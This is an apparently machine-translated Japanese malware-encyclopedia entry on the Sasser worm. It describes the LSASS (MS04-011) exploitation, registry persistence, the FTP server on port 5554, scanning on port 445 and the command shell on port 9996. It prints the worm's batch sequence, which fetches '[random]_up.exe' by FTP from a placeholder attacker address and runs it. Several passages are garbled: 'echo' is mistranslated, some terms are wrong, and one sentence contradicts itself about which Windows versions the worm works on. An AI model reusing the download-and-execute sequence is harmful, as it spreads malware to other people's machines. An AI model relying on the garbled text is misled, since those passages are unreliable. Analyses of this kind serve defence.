Net-Worm.Win32.Sasser

Sasserは、 Microsoft Security Bulletin MS04-011に記載されているMS Windows LSASSの脆弱性を悪用するインターネットワームです。

マイクロソフトは2004年4月13日にこの脆弱性に対するパッチをリリースしました.Sasser.aは2004年4月30日に最初に検出されました。

サッサーは除くこと、Lovesanのに非常によく似た方法で動作Lovesanのは、 PRC DCOMサービスではなく、LSASSサービスの脆弱性を悪用しました。

Sasserは、Windows 2000、Windows XP、Windows Server 2003を実行しているコンピュータに影響します。Sasserは他のすべてのバージョンのWindowsでは機能しますが、この脆弱性による攻撃では感染できません。

SasserはVisual Cコンパイラを使用してC / C ++で書かれています。このワームは約15KLで、PECompact2で圧縮されています。

感染の徴候

• Windowsディレクトリ内のファイル 'avserve.exe'。
• LSASSサービスに関するエラーメッセージが表示されず、通常はシステムが再起動します。

伝搬

起動後、Sasserはavserve.exeという名前でWindowsのルートディレクトリに自身をコピーし、このファイルをシステムレジストリの自動実行キーに登録します。

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "％WINDIR％avserve.exe" 

Sasserは、感染の将来の試みの場合に、自身のコピーを見つけるためにRAMに一意の識別子 'Jobaka31'を作成します。

SasserはTCPポート5554でFTPサーバーを起動し、次に128の伝播ルーチンを起動します。このプロセス中、ワームはシステムの再起動を禁止するためにAbortSystemShutdownプロセスを開始しようとします。

Sasserは犠牲者アドレスを特定するためにIPアドレススキャンを開始し、TCPポート445に要求を送信します。マシンが応答すると、SasserはLSASSの脆弱性を悪用してTCPポート9996で 'cmd.exe'コマンドシェルを起動します。感染したマシンに「N_up.exe」という名前でメインワームコンポーネントをダウンロードして起動するように指示します。「N」は乱数です。

 エコーオフ



エコーオープン [攻撃マシンアドレス] 5554 >> cmd.ftp



echo anonymous >> cmd.ftp



ユーザーをエコーする



echo bin >> cmd.ftp



echo get [乱数] _up.exe >> cmd.ftp



echo bye >> cmd.ftp



エコーオン



ftp -s：cmd.ftp



[乱数] _up.exe



エコーオフ



del cmd.ftp



エコーオン 

その結果、1台のマシンが2回以上攻撃され、以下のようなサンプル名のワームの複数のコピーが含まれている可能性があります。

 23101_up.exe



5409_up.exe 

等々。

その他

感染後、犠牲PCはLSASSサービスが失敗したことに関するエラーメッセージを生成し、そこでリブートを試みる可能性があります。

Sasserは、Cドライブのルートディレクトリに「win.log」ファイルを作成します。このディレクトリでは、攻撃されたすべてのマシンのIPアドレスが記録されます。